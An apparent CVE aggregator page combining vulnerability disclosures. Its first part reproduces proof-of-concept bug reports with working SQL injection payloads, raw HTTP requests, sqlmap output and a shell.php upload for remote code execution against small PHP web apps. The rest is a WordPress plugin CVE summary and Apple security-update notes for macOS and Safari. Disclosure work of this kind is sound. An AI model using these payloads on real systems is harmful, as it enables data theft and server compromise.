Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=delete.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=delete

Vulnerability location: /BabyCare/admin.php?id=posts&action=delete&postid=7&image= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=delete&postid=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+&image= //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=delete&postid\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--+&image= HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=delete&postid\=7' RLIKE (SELECT (CASE WHEN (3209=3209) THEN 7 ELSE 0x28 END))-- pges&image=
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=posts&action=delete&postid=7' AND EXTRACTVALUE(7032,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7032\=7032,1))),0x7171787171))\-- OvNm&image=

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=delete&postid\=7' AND (SELECT 3278 FROM (SELECT(SLEEP(5)))KhCO)-- EGcS&image=
\--

CVE-2022-28423: bug_report/SQLi-4.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=school_year.

Permalink

Cannot retrieve contributors at this time

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=school\_year

Vulnerability location: /student-grading-system/rms.php?page=school\_year,sy

\[+\] Pyaload: id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

POST /student\-grading\-system/rms.php?page\=school\_year HTTP/1.1
Host: 192.168.1.19
Content\-Length: 71
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=school\_year
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

CVE-2022-28025: bug_report/SQLi-2.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=grade.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=grade

Vulnerability location: /student-grading-system/rms.php?page=grade,id

\[+\] Pyaload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

POST /student\-grading\-system/rms.php?page\=grade HTTP/1.1
Host: 192.168.1.19
Content\-Length: 133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=grade
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

CVE-2022-28024: bug_report/SQLi-1.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=student_p&id=.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=student\_p&id=

Vulnerability location: /student-grading-system/rms.php?page=student\_p&id=,id

\[+\] Pyaload: id=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19--+-

GET /student\-grading\-system/rms.php?page\=student\_p&id\=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19\--+- HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=j0d3j11j73v4lm3m8d74g5d3gu
Connection: close

CVE-2022-28026: bug_report/SQLi-3.md at main · k0xx11/bug_report

Purchase Order Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via /purchase_order/admin/?page=user.

Permalink

Cannot retrieve contributors at this time

**Purchase-order-management-system v1.0 by oretnom23 has arbitrary code execution (RCE)**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability url: http://ip/purchase\_order/admin/?page=user

Request package for file upload：

POST /purchase\_order/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
Content\-Length: 799
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylz8EuWf30x9QqTzc
Origin: http://192.168.1.19
Referer: http://192.168.1.19/purchase\_order/admin/?page=user/manage\_user&id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sils4jibq9sp4e2n7i4joq8to7
Connection: close
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="id"
3
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="firstname"
Mike 
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="lastname"
Williams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="username"
mwilliams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="password"
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="type"
2
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\------WebKitFormBoundarylz8EuWf30x9QqTzc--

The file will be uploaded to the uploads directory

We visit the url of the shell.php file and find that the code has been executed

Url: http://ip/purchase\_order/uploads/1648212480\_shell.php

CVE-2022-28021: bug_report/RCE-1.md at main · k0xx11/bug_report

The WordPress plugin Be POPIA Compliant exposed sensitive information to unauthenticated users consisting of site visitors emails and usernames via an API route, in versions up to an including 1.1.5.

CVE-2022-1186: Changeset 2701343 for be-popia-compliant – WordPress Plugin Repository

A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.

Released March 14, 2022

**Accelerate Framework**

Available for: macOS Big Sur

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: ryuzaki

Entry updated May 25, 2022

**AppKit**

Available for: macOS Big Sur

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

Entry added May 25, 2022

**AppleGraphicsControl**

Available for: macOS Big Sur

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22631: Wang Yu of cyberserval

Entry updated May 25, 2022

**AppleScript**

Available for: macOS Big Sur

Impact: An application may be able to read restricted memory

Description: This issue was addressed with improved checks.

CVE-2022-22648: Mickey Jin (@patch1t) of Trend Micro

Entry updated May 25, 2022

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro

CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro

**BOM**

Available for: macOS Big Sur

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**CUPS**

Available for: macOS Big Sur

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-26691: Joshua Mason of Mandiant

Entry added May 25, 2022

**Intel Graphics Driver**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-22661: an anonymous researcher, Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab

Entry updated May 25, 2022

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22615: an anonymous researcher

CVE-2022-22614: an anonymous researcher

**Kernel**

Available for: macOS Big Sur

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: macOS Big Sur

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Login Window**

Available for: macOS Big Sur

Impact: A person with access to a Mac may be able to bypass Login Window

Description: This issue was addressed with improved checks.

CVE-2022-22647: Yuto Ikeda of Kyushu University

Entry updated May 25, 2022

**LoginWindow**

Available for: macOS Big Sur

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22656

**MobileAccessoryUpdater**

Available for: macOS Big Sur

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-22672: Siddharth Aeri (@b1n4r1b01)

Entry added May 25, 2022

**PackageKit**

Available for: macOS Big Sur

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22617: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Big Sur

Impact: A malicious app with root privileges may be able to modify the contents of system files

Description: An issue in the handling of symlinks was addressed with improved validation.

CVE-2022-26688: Mickey Jin (@patch1t) of Trend Micro

Entry added May 25, 2022

**QuickTime Player**

Available for: macOS Big Sur

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-22650: Wojciech Reguła (@\_r3ggi) of SecuRing

**Siri**

Available for: macOS Big Sur

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)

Entry updated May 25, 2022

**SMB**

Available for: macOS Big Sur

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22651: Felix Poulin-Belanger

Entry added May 25, 2022

**WebKit**

Available for: macOS Big Sur

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

Entry added May 25, 2022

**WebKit**

Available for: macOS Big Sur

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**xar**

Available for: macOS Big Sur

Impact: A local user may be able to write arbitrary files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2022-22582: Richard Warren of NCC Group

CVE-2022-22633: About the security content of macOS Big Sur 11.6.5

A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.

Released March 14, 2022

**Accelerate Framework**

Available for: macOS Monterey

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22669: an anonymous researcher

**AppKit**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22631: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: An application may be able to read restricted memory

Description: This issue was addressed with improved checks.

CVE-2022-22648: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro

CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro

**BOM**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**curl**

Available for: macOS Monterey

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating to curl version 7.79.1.

CVE-2021-22946

CVE-2021-22947

CVE-2021-22945

Entry updated March 21, 2022

**FaceTime**

Available for: macOS Monterey

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba Security Pandora Lab

**IOGPUFamily**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: macOS Monterey

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22640: sqrtpwn

**libarchive**

Available for: macOS Monterey

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**Login Window**

Available for: macOS Monterey

Impact: A person with access to a Mac may be able to bypass Login Window

Description: This issue was addressed with improved checks.

CVE-2022-22647: an anonymous researcher

**LoginWindow**

Available for: macOS Monterey

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22656

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-22657: Brandon Perry of Atredis Partners

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22664: Brandon Perry of Atredis Partners

**NSSpellChecker**

Available for: macOS Monterey

Impact: A malicious application may be able to access information about a user's contacts

Description: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.

CVE-2022-22644: an anonymous researcher

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22617: Mickey Jin (@patch1t)

**Preferences**

Available for: macOS Monterey

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**QuickTime Player**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-22650: Wojciech Reguła (@\_r3ggi) of SecuRing

**Safari Downloads**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**Sandbox**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran

**Siri**

Available for: macOS Monterey

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)

**SMB**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22651: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey Jin (@patch1t)

**System Preferences**

Available for: macOS Monterey

Impact: An app may be able to spoof system notifications and UI

Description: This issue was addressed with a new entitlement.

CVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**UIKit**

Available for: macOS Monterey

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**Vim**

Available for: macOS Monterey

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2021-4136

CVE-2021-4166

CVE-2021-4173

CVE-2021-4187

CVE-2021-4192

CVE-2021-4193

CVE-2021-46059

CVE-2022-0128

CVE-2022-0156

CVE-2022-0158

**VoiceOver**

Available for: macOS Monterey

Impact: A user may be able to view restricted content from the lock screen

Description: A lock screen issue was addressed with improved state management.

CVE-2021-30918: an anonymous researcher

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Monterey

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

**xar**

Available for: macOS Monterey

Impact: A local user may be able to write arbitrary files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2022-22582: Richard Warren of NCC Group

CVE-2022-22665: About the security content of macOS Monterey 12.3

A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted mail message may lead to running arbitrary javascript.

This document describes the security content of Safari 15.3.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Safari 15.3**

Released January 26, 2022

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22590: Toan Pham from Team Orca of Sea Security (security.sea.com)

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A logic issue was addressed with improved state management.

CVE-2022-22592: Prakash (@1lastBr3ath)

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing a maliciously crafted mail message may lead to running arbitrary javascript

Description: A validation issue was addressed with improved input sanitization.

CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)

**WebKit Storage**

Available for: macOS Big Sur and macOS Catalina

Impact: A website may be able to track sensitive user information

Description: A cross-origin issue in the IndexDB API was addressed with improved input validation.

CVE-2022-22594: Martin Bajanik of FingerprintJS

 

**Additional recognition**

**WebKit**

We would like to acknowledge Prakash (@1lastBr3ath) for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: January 26, 2022

Tag

#webkit